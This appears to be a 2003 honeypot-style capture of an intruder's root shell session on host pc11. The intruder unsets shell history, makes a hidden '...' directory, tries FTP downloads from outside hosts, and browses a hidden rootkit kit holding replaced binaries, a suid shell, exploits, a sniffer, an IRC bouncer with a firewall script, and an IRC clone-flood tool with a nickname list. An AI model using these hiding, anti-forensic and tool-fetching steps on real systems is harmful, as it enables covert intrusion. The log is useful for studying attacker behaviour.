Mon Jun 16 02:34:02 HKT 2003
================================

Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
unset HISTFILE
]0;root@pc11: /root[root@pc11 /root]# w
  1:30am  up 12 days, 10:21,  0 users,  load average: 0.23, 0.09, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
]0;root@pc11: /root[root@pc11 /root]# mkdir /usr/sbin/"..."
]0;root@pc11: /root[root@pc11 /root]# socklist
bash: socklist: command not found
]0;root@pc11: /root[root@pc11 /root]# cd /usr/sbin/"..."
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ls
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ftp someshit.netfir,s.com
ftp: someshit.netfir,s.com: unknown host
ftp> by
ftp s]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ftp someshit.netfirms.com
ftp: connect: Connection timed out
ftp> bye
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# locate emech
warning: locate : could not open database: /var/lib/slocate/slocate.db: No such file or directory
warning: You need to run the 'updatedb' command (as root) to create the database.
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ftp 66.48.76.90
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# 
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ind / |grep emech
bash: ind: command not found
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# find  / |grep emech
find: /proc/17100/fd: No such file or directory
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# find  / |grep emech
find: /proc/17100/fd: No such file or directory
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# find  / |grep psybnc
find: /proc/17100/fd: No such file or directory
/usr/bin/.rave/.b/log/psybnc.log
/usr/bin/.rave/.b/log/psybnc.log.old
/usr/bin/.rave/.b/src/psybnc.c
/usr/bin/.rave/.b/src/psybnc.o
/usr/bin/.rave/.b/psybncchk
/usr/bin/.rave/.b/psybnc.conf
/usr/bin/.rave/.b/psybnc.pid
/usr/bin/.rave/.b/psybnc.conf.old
/usr/bin/.tux/tools/psybnc
/usr/bin/.tux/tools/psybnc/help
/usr/bin/.tux/tools/psybnc/help/ADDLOG.TXT
/usr/bin/.tux/tools/psybnc/help/DELLOG.TXT
/usr/bin/.tux/tools/psybnc/help/LISTLOGS.TXT
/usr/bin/.tux/tools/psybnc/help/PLAYTRAFFICLOG.TXT
/usr/bin/.tux/tools/psybnc/help/PROXY.TXT
/usr/bin/.tux/tools/psybnc/help/SETLEAVEMSG.TXT
/usr/bin/.tux/tools/psybnc/help/SETAWAYNICK.TXT
/usr/bin/.tux/tools/psybnc/help/ADDAUTOOP.TXT
/usr/bin/.tux/tools/psybnc/help/DELAUTOOP.TXT
/usr/bin/.tux/tools/psybnc/help/LISTAUTOOPS.TXT
/usr/bin/.tux/tools/psybnc/help/SRELOAD.TXT
/usr/bin/.tux/tools/psybnc/help/ADDALLOW.TXT
/usr/bin/.tux/tools/psybnc/help/ADDASK.TXT
/usr/bin/.tux/tools/psybnc/help/ADDBAN.TXT
/usr/bin/.tux/tools/psybnc/help/ADDDCC.TXT
/usr/bin/.tux/tools/psybnc/help/ADDNETWORK.TXT
/usr/bin/.tux/tools/psybnc/help/ADDOP.TXT
/usr/bin/.tux/tools/psybnc/help/ADDSERVER.TXT
/usr/bin/.tux/tools/psybnc/help/ADDUSER.TXT
/usr/bin/.tux/tools/psybnc/help/BCONNECT.TXT
/usr/bin/.tux/tools/psybnc/help/BHELP.TXT
/usr/bin/.tux/tools/psybnc/help/BKILL.TXT
/usr/bin/.tux/tools/psybnc/help/BQUIT.TXT
/usr/bin/.tux/tools/psybnc/help/BWHO.TXT
/usr/bin/.tux/tools/psybnc/help/DELALLOW.TXT
/usr/bin/.tux/tools/psybnc/help/DELASK.TXT
/usr/bin/.tux/tools/psybnc/help/DELBAN.TXT
/usr/bin/.tux/tools/psybnc/help/DELDCC.TXT
/usr/bin/.tux/tools/psybnc/help/DELENCRYPT.TXT
/usr/bin/.tux/tools/psybnc/help/LISTASK.TXT
/usr/bin/.tux/tools/psybnc/help/DELLINK.TXT
/usr/bin/.tux/tools/psybnc/help/DELNETWORK.TXT
/usr/bin/.tux/tools/psybnc/help/DELOP.TXT
/usr/bin/.tux/tools/psybnc/help/DELSERVER.TXT
/usr/bin/.tux/tools/psybnc/help/DELTRANSLATE.TXT
/usr/bin/.tux/tools/psybnc/help/DELUSER.TXT
/usr/bin/.tux/tools/psybnc/help/ENCRYPT.TXT
/usr/bin/.tux/tools/psybnc/help/ERASEMAINLOG.TXT
/usr/bin/.tux/tools/psybnc/help/ERASEPRIVATELOG.TXT
/usr/bin/.tux/tools/psybnc/help/ERASETRAFFICLOG.TXT
/usr/bin/.tux/tools/psybnc/help/JUMP.TXT
/usr/bin/.tux/tools/psybnc/help/LINKFROM.TXT
/usr/bin/.tux/tools/psybnc/help/LINKTO.TXT
/usr/bin/.tux/tools/psybnc/help/LISTALLOW.TXT
/usr/bin/.tux/tools/psybnc/help/AIDLE.TXT
/usr/bin/.tux/tools/psybnc/help/LISTBANS.TXT
/usr/bin/.tux/tools/psybnc/help/LISTDCC.TXT
/usr/bin/.tux/tools/psybnc/help/LISTENCRYPT.TXT
/usr/bin/.tux/tools/psybnc/help/LISTLINKS.TXT
/usr/bin/.tux/tools/psybnc/help/LISTOPS.TXT
/usr/bin/.tux/tools/psybnc/help/LISTSERVERS.TXT
/usr/bin/.tux/tools/psybnc/help/MADMIN.TXT
/usr/bin/.tux/tools/psybnc/help/NAMEBOUNCER.TXT
/usr/bin/.tux/tools/psybnc/help/PASSWORD.TXT
/usr/bin/.tux/tools/psybnc/help/PLAYMAINLOG.TXT
/usr/bin/.tux/tools/psybnc/help/PLAYPRIVATELOG.TXT
/usr/bin/.tux/tools/psybnc/help/RELAYLINK.TXT
/usr/bin/.tux/tools/psybnc/help/SETAWAY.TXT
/usr/bin/.tux/tools/psybnc/help/SETUSERNAME.TXT
/usr/bin/.tux/tools/psybnc/help/SOCKSTAT.TXT
/usr/bin/.tux/tools/psybnc/help/TRANSLATE.TXT
/usr/bin/.tux/tools/psybnc/help/UNADMIN.TXT
/usr/bin/.tux/tools/psybnc/help/VHOST.TXT
/usr/bin/.tux/tools/psybnc/help/SETLINKKEY.TXT
/usr/bin/.tux/tools/psybnc/help/SETUSERKEY.TXT
/usr/bin/.tux/tools/psybnc/help/RELINK.TXT
/usr/bin/.tux/tools/psybnc/help/DCCCHAT.TXT
/usr/bin/.tux/tools/psybnc/help/DCCANSWER.TXT
/usr/bin/.tux/tools/psybnc/help/DCCSEND.TXT
/usr/bin/.tux/tools/psybnc/help/DCCGET.TXT
/usr/bin/.tux/tools/psybnc/help/DCCCANCEL.TXT
/usr/bin/.tux/tools/psybnc/help/BREHASH.TXT
/usr/bin/.tux/tools/psybnc/help/LISTTASKS.TXT
/usr/bin/.tux/tools/psybnc/help/SWITCHNET.TXT
/usr/bin/.tux/tools/psybnc/help/DCCENABLE.TXT
/usr/bin/.tux/tools/psybnc/help/AUTOREJOIN.TXT
/usr/bin/.tux/tools/psybnc/help/LEAVEQUIT.TXT
/usr/bin/.tux/tools/psybnc/help/AUTOGETDCC.TXT
/usr/bin/.tux/tools/psybnc/log
/usr/bin/.tux/tools/psybnc/log/INFO
/usr/bin/.tux/tools/psybnc/log/psybnc.log
/usr/bin/.tux/tools/psybnc/log/psybnc.log.old
/usr/bin/.tux/tools/psybnc/log/USER1.TRL
/usr/bin/.tux/tools/psybnc/log/USER2.TRL
/usr/bin/.tux/tools/psybnc/log/USER3.TRL
/usr/bin/.tux/tools/psybnc/log/USER4.TRL
/usr/bin/.tux/tools/psybnc/log/USER1.LOG
/usr/bin/.tux/tools/psybnc/log/USER3.LOG
/usr/bin/.tux/tools/psybnc/log/USER4.LOG
/usr/bin/.tux/tools/psybnc/log/USER1.LOG.old
/usr/bin/.tux/tools/psybnc/log/USER2.LOG.old
/usr/bin/.tux/tools/psybnc/log/USER3.LOG.old
/usr/bin/.tux/tools/psybnc/log/USER4.LOG.old
/usr/bin/.tux/tools/psybnc/menuconf
/usr/bin/.tux/tools/psybnc/menuconf/dialog.h
/usr/bin/.tux/tools/psybnc/menuconf/checklist.c
/usr/bin/.tux/tools/psybnc/menuconf/inputbox.c
/usr/bin/.tux/tools/psybnc/menuconf/menubox.c
/usr/bin/.tux/tools/psybnc/menuconf/util.c
/usr/bin/.tux/tools/psybnc/menuconf/menuconf.c
/usr/bin/.tux/tools/psybnc/menuconf/colors.h
/usr/bin/.tux/tools/psybnc/menuconf/textbox.c
/usr/bin/.tux/tools/psybnc/menuconf/help
/usr/bin/.tux/tools/psybnc/menuconf/help/h101.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h102.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h103.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h104.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h106.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h107.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h105.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h201.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h202.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h204.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h203.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h206.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h205.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h207.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h208.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h209.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h210.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h211.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h212.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h213.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h214.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h215.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h216.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h217.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h218.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h501.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h502.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h503.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h504.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h505.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h301.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h302.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h303.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h304.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h305.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h601.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h306.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h701.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h702.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h703.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h704.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h705.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h706.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h707.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h708.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h709.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h710.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h711.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h712.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h713.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h714.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h716.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h219.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h715.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h220.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h221.txt
/usr/bin/.tux/tools/psybnc/menuconf/inifunc.c
/usr/bin/.tux/tools/psybnc/motd
/usr/bin/.tux/tools/psybnc/motd/INFO
/usr/bin/.tux/tools/psybnc/motd/USER2.MOTD
/usr/bin/.tux/tools/psybnc/motd/USER1.MOTD.old
/usr/bin/.tux/tools/psybnc/motd/USER3.MOTD
/usr/bin/.tux/tools/psybnc/motd/USER3.MOTD.old
/usr/bin/.tux/tools/psybnc/motd/USER2.MOTD.old
/usr/bin/.tux/tools/psybnc/motd/USER4.MOTD.old
/usr/bin/.tux/tools/psybnc/scripts
/usr/bin/.tux/tools/psybnc/scripts/INFO
/usr/bin/.tux/tools/psybnc/scripts/example
/usr/bin/.tux/tools/psybnc/scripts/example/DEFAULT.SCRIPT
/usr/bin/.tux/tools/psybnc/src
/usr/bin/.tux/tools/psybnc/src/p_script.c
/usr/bin/.tux/tools/psybnc/src/match.c
/usr/bin/.tux/tools/psybnc/src/p_blowfish.c
/usr/bin/.tux/tools/psybnc/src/p_client.c
/usr/bin/.tux/tools/psybnc/src/p_crypt.c
/usr/bin/.tux/tools/psybnc/src/p_data.h
/usr/bin/.tux/tools/psybnc/src/p_dcc.c
/usr/bin/.tux/tools/psybnc/src/p_global.h
/usr/bin/.tux/tools/psybnc/src/p_hash.c
/usr/bin/.tux/tools/psybnc/src/p_idea.c
/usr/bin/.tux/tools/psybnc/src/p_inifunc.c
/usr/bin/.tux/tools/psybnc/src/p_link.c
/usr/bin/.tux/tools/psybnc/src/p_log.c
/usr/bin/.tux/tools/psybnc/src/p_memory.c
/usr/bin/.tux/tools/psybnc/src/p_network.c
/usr/bin/.tux/tools/psybnc/src/p_parse.c
/usr/bin/.tux/tools/psybnc/src/p_peer.c
/usr/bin/.tux/tools/psybnc/src/p_server.c
/usr/bin/.tux/tools/psybnc/src/p_socket.c
/usr/bin/.tux/tools/psybnc/src/p_string.c
/usr/bin/.tux/tools/psybnc/src/p_sysmsg.c
/usr/bin/.tux/tools/psybnc/src/p_translate.c
/usr/bin/.tux/tools/psybnc/src/p_userfile.c
/usr/bin/.tux/tools/psybnc/src/p_version.h
/usr/bin/.tux/tools/psybnc/src/psybnc.c
/usr/bin/.tux/tools/psybnc/src/snprintf.c
/usr/bin/.tux/tools/psybnc/src/p_intnet.c
/usr/bin/.tux/tools/psybnc/src/p_topology.c
/usr/bin/.tux/tools/psybnc/src/bsd-setenv.c
/usr/bin/.tux/tools/psybnc/src/p_uchannel.c
/usr/bin/.tux/tools/psybnc/src/psybnc.o
/usr/bin/.tux/tools/psybnc/src/match.o
/usr/bin/.tux/tools/psybnc/src/p_client.o
/usr/bin/.tux/tools/psybnc/src/p_crypt.o
/usr/bin/.tux/tools/psybnc/src/p_dcc.o
/usr/bin/.tux/tools/psybnc/src/p_hash.o
/usr/bin/.tux/tools/psybnc/src/p_idea.o
/usr/bin/.tux/tools/psybnc/src/p_inifunc.o
/usr/bin/.tux/tools/psybnc/src/p_link.o
/usr/bin/.tux/tools/psybnc/src/p_log.o
/usr/bin/.tux/tools/psybnc/src/p_memory.o
/usr/bin/.tux/tools/psybnc/src/p_network.o
/usr/bin/.tux/tools/psybnc/src/p_parse.o
/usr/bin/.tux/tools/psybnc/src/p_peer.o
/usr/bin/.tux/tools/psybnc/src/p_server.o
/usr/bin/.tux/tools/psybnc/src/p_socket.o
/usr/bin/.tux/tools/psybnc/src/p_string.o
/usr/bin/.tux/tools/psybnc/src/p_sysmsg.o
/usr/bin/.tux/tools/psybnc/src/p_userfile.o
/usr/bin/.tux/tools/psybnc/src/p_uchannel.o
/usr/bin/.tux/tools/psybnc/src/p_script.o
/usr/bin/.tux/tools/psybnc/src/p_topology.o
/usr/bin/.tux/tools/psybnc/src/p_intnet.o
/usr/bin/.tux/tools/psybnc/src/p_blowfish.o
/usr/bin/.tux/tools/psybnc/src/p_translate.o
/usr/bin/.tux/tools/psybnc/src/snprintf.o
/usr/bin/.tux/tools/psybnc/tools
/usr/bin/.tux/tools/psybnc/tools/convconf.c
/usr/bin/.tux/tools/psybnc/tools/makesalt.c
/usr/bin/.tux/tools/psybnc/tools/autoconf.c
/usr/bin/.tux/tools/psybnc/tools/chkenv.c
/usr/bin/.tux/tools/psybnc/tools/chkbind.c
/usr/bin/.tux/tools/psybnc/tools/chkipv6.c
/usr/bin/.tux/tools/psybnc/tools/chksock.c
/usr/bin/.tux/tools/psybnc/tools/chktime.c
/usr/bin/.tux/tools/psybnc/tools/convconf
/usr/bin/.tux/tools/psybnc/tools/autoconf
/usr/bin/.tux/tools/psybnc/tools/sys
/usr/bin/.tux/tools/psybnc/tools/.chk
/usr/bin/.tux/tools/psybnc/tools/chksock
/usr/bin/.tux/tools/psybnc/tools/chkenv
/usr/bin/.tux/tools/psybnc/tools/chkipv6
/usr/bin/.tux/tools/psybnc/CHANGES
/usr/bin/.tux/tools/psybnc/COPYING
/usr/bin/.tux/tools/psybnc/FAQ
/usr/bin/.tux/tools/psybnc/Makefile
/usr/bin/.tux/tools/psybnc/README
/usr/bin/.tux/tools/psybnc/TODO
/usr/bin/.tux/tools/psybnc/config.h
/usr/bin/.tux/tools/psybnc/psybncchk
/usr/bin/.tux/tools/psybnc/targets.mak
/usr/bin/.tux/tools/psybnc/psybnc.conf
/usr/bin/.tux/tools/psybnc/makefile.out
/usr/bin/.tux/tools/psybnc/makesalt
/usr/bin/.tux/tools/psybnc/salt.h
/usr/bin/.tux/tools/psybnc/psybnc.pid
/usr/bin/.tux/tools/psybnc/psybnc.conf.old
/usr/bin/.tux/tools/psybnc/fam
/usr/bin/.tux/tools/psybnc/USER1.LOG
/usr/bin/.tux/tools/psybnc/USER1.LOG.old
/usr/bin/.tux/tools/psybnc/USER2.LOG
/usr/bin/.tux/tools/psybnc/USER3.LOG
/usr/bin/.tux/tools/psybnc/USER3.LOG.old
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# cd /usr/bin/.tux/
]0;root@pc11: /usr/bin/.tux[root@pc11 .tux]# ls
backup  suidsh  tools
]0;root@pc11: /usr/bin/.tux[root@pc11 .tux]# cd backup
]0;root@pc11: /usr/bin/.tux/backup[root@pc11 backup]# ls
crontab   dmesg     ifconfig  login     ps        tcpd      vdir
df        du        killall   ls        pstree    top
dir       find      locate    netstat   syslogd   updatedb
]0;root@pc11: /usr/bin/.tux/backup[root@pc11 backup]# cd ..
]0;root@pc11: /usr/bin/.tux[root@pc11 .tux]# cd tools
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd firewall
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ls
close  start  stop
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# mc
bash: mc: command not found
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# cat start |less
[?1048h[?1047h[?1h=#!/bin/sh
# Firewall By Fracktal

# You don't need to edit anything below this
STARTTIME=`date +%s`
echo "Firewall rulez"
echo "Presented by Fracktal"
echo "Fracktal@fracktal.us"
echo "(C) 06-10-2002"

if [ $# != 2 ]
then
 echo ""
 echo "ERROR: You did not specify all the needed commands."
 echo "Usage: $0   "       
 exit
fi

echo ""
echo "Firewall started at :`date +%l:%M:%S`"
echo "SSHD   listening at port : $1"
echo "psyBNC listening at port : $2"
echo ""
:
:printf "Closing all ports... "
:/sbin/ipchains -A input -j DENY -s 0/0 -d 0/0 -p all
:/sbin/ipchains -A output -j DENY -s 0/0 -d 0/0 -p all
:printf "done."
:echo ""
:printf "Opening desired ports "
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $1
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $1
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $1
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $1
:
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $2
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $2
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $2
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $2
:
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport 6660:6669
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport 6660:6669
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --sport 6660:6669
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --dport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --sport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --dport 6660:6669
:
:printf "done."
:echo ""
:echo "Firewall rulez started!"
:
:
:
:(END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) [?1l>[?1047l[?1048l]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# qls
bash: qls: command not found
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ls
close  start  stop
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd exploits
]0;root@pc11: /usr/bin/.tux/tools/exploits[root@pc11 exploits]# ls
epcs2         epcs2.c       sendmailx.sh
]0;root@pc11: /usr/bin/.tux/tools/exploits[root@pc11 exploits]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd ssh
]0;root@pc11: /usr/bin/.tux/tools/ssh[root@pc11 ssh]# ls
scp  ssh
]0;root@pc11: /usr/bin/.tux/tools/ssh[root@pc11 ssh]# ./ssh
Usage: ssh [options] host [command]
Options:
  -l user     Log in using this user name.
  -n          Redirect input from /dev/null.
  -F config   Config file (default: ~/.ssh/config).
  -A          Enable authentication agent forwarding.
  -a          Disable authentication agent forwarding (default).
  -X          Enable X11 connection forwarding.
  -x          Disable X11 connection forwarding (default).
  -i file     Identity for public key authentication (default: ~/.ssh/identity)
  -t          Tty; allocate a tty even if command is given.
  -T          Do not allocate a tty.
  -v          Verbose; display verbose debugging messages.
              Multiple -v increases verbosity.
  -V          Display version number only.
  -P          Don't allocate a privileged port.
  -q          Quiet; don't display any warning messages.
  -f          Fork into background after authentication.
  -e char     Set escape character; ``none'' = disable (default: ~).
  -c cipher   Select encryption algorithm
  -m macs     Specify MAC algorithms for protocol version 2.
  -p port     Connect to this port.  Server must be on the same port.
  -L listen-port:host:port   Forward local port to remote address
  -R listen-port:host:port   Forward remote port to local address
              These cause ssh to listen for connections on a port, and
              forward them to the other side by connecting to host:port.
  -D port     Enable dynamic application-level port forwarding.
  -C          Enable compression.
  -N          Do not execute a shell or command.
  -g          Allow remote hosts to connect to forwarded ports.
  -1          Force protocol version 1.
  -2          Force protocol version 2.
  -4          Use IPv4 only.
  -6          Use IPv6 only.
  -o 'option' Process the option as if it was read from a configuration file.
  -s          Invoke command (mandatory) as SSH2 subsystem.
  -b addr     Local IP address.
]0;root@pc11: /usr/bin/.tux/tools/ssh[root@pc11 ssh]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# utils
bash: utils: command not found
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd utils
]0;root@pc11: /usr/bin/.tux/tools/utils[root@pc11 utils]# ls
wget
]0;root@pc11: /usr/bin/.tux/tools/utils[root@pc11 utils]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd ecmf
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ls
id         mf         mirkforce  nicks2
idents     mfclean    nicks      realnames
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# cat idents
Katarina
Linux
Fjortisch
Jej^borta
Lamour
Kungen
Marillion
mythic
question
unicron
M0on_STOP
psioncore
O-xyg3n
puppet_m
X_treme
Edgie
triumph
Surfer
outworld
Secret-
Myst0r
ghostie
Forever
Asmodi^Zz
Lordie
En4cer_
vader_
gracie
sweetii
_Andreas_
Bella_
Johnny
Glidaren
PrOxYmA
Jaffa-
Catgirl17
honeii
Latina19
stussy
LenisAway
Borre
shio_
Joelbitar
sweetlady
Willgood
Weebee
cl0biZ-
stj
joshua_
John_Dow
G-Sund
Snoop^Girl
KOJV
slaktarn
Dan21
KBee
lph
Fairsight
Dragon^
Niklas22
Serpentor
Mike^26
Lisa`29
iMP
monikaw
darknz
poofie
ja0
SwePilot
EuroTrash
Khan
capr1corn
Malkav
rainDance
Zinj
Sweklopi
timewalk
jester
jn
Mrb0x
jANNE
ArskaZ
Ably
SveaRike
Servant
Sl0gon
Dr1tte
SpaceDump
Kardinal
Dj_TT
cobe
demig0d
Brujah
flum
[aus]
NatBorta
Mailman
SpaceBBL
Tys0n
Phreaky
ObiWanBip
alex_ndra
Sta^zZz
danic
BlUeAnGeL
zizu
Klaara
Johannes
jossumi
miina_
Master
aulis
Juge_81
tomi20hki
Cathren
JayC
varjo
floutti
hali
mHj
iasv
joni
VuuBeibe
Nallllle
Vicious
abbore
kodE
Mikma
Hazor
wellu_
SunSola
PowerPc
Jonni
Fin
Alikki
Outzake
hoffi
Juutsu
sTeVe
winny
nCuBuS
venus_guy
Smarties
nAtALiE^
rUthLesS
Lingyee
TnX`fck
nana_sk8
Yen_Yen
PIHKAL
w00p
tuNGau
terkukur
zwsiew
pshyche
YoGiEBeaR
Lonelygal
V1
liza
TATANO
LoNeLy
stj
Sch|z0-SH
sperm_boy
Musicgal
V2one
PoPY
WaSaB|BoY
sutera
liverpoo
lisha
niceguy16
WiNg20
tommy
RaIDen16
Sorceress
TuPac
tAku^mUrA
melanie22
suez
Terence15
mac_
vodafone
linda
VireX[0]
TrUst^Me
shearer
zai
sammi
sukun
turbozzzz
musashi
wendy
lopez
Mr_JeE
stjf
liz22
MyWife
R9
lily15
mui-mui
tarabas
sean-18
Lisa29
orac
Raye
ranu
Y2KBug
LoveByte
Siren
Mooks
RotiCanai
LiYen
palia_dog
MaMaKians
alias
Bluey
stinga
Inkworks
Cruizer_1
Monroe
AeroDream
AMBRA1
Lupo
f_r_a
Davide
tennis
rugiada
Furia
lucignol8
alexia
RED
w|lly
sweetii
PERMALOSO
birillo46
litta
Gad
EBE9
maurino
Z10F3ST3R
ReArtu
olivia78
brigitta
igi09
SATAN_INS
LullaBy
JavaGrl
Alberto2
ALVIN^
DottMorte
sharmm
Tato_38
Blietta
MARCO31
mary30
WolfMan
rita26
daniela
RONALDO9
fluffer
TOPO
FwsMou
ragnetto
Judy
fqw
mimma
vass
only
bizio
Quattro
giugno
Diabolik
CURE
sm4ck
vento
ragio
Elly
CubaLibre
Furunkuli
Organza
Yashy
athanas
legend4
xarasou
L_egend5
einaimou
OuRLoVe
Zwi-Mou
Zwi-Sou
Psixi-Mou
aCrImA
ALE39
Anja
Cocker
ArNtZ
skill
Grave25
vajje
vidXXX
M1g-2
CrnaRuka
BlackHand
Studenica
Kajman
MaRaKaNa
Bedem
Kalca
Jamezdin
SkyGuN
musc1e
PaZaRaC
Nimfa
Suhoj-35
Manari-Sou
Psixi-Sou
Manarimou
DumbBl0nD
L0ala
Kralj
Sopocani
Sodoma
Tvrdjava
Andjela
Gomora
MaRaDoNa
Kiwi
ZvEzDa
Ibar
Raska
Dusica
Ribica
KaSaNdRa
Vanda
Harry
Mika
mro
Dolphin
Bram
wanderer
wanderer
Freud
Mamaw
Mamaw
shekel
devastor
juha
SkyLink
Sethi
NeuTRiNo
|Des|
quattro-
ogre
Dario
msd
tenx
Coop_
Szern-
MOLadmin
TaLLa2XLC
shekel
CHaiNeSS
Beeth
aS2
kurai
primetime
Muti
MHz
Turing
Elef
nico
coke
krista
snake
Mephisto
scorpi0n
anjing
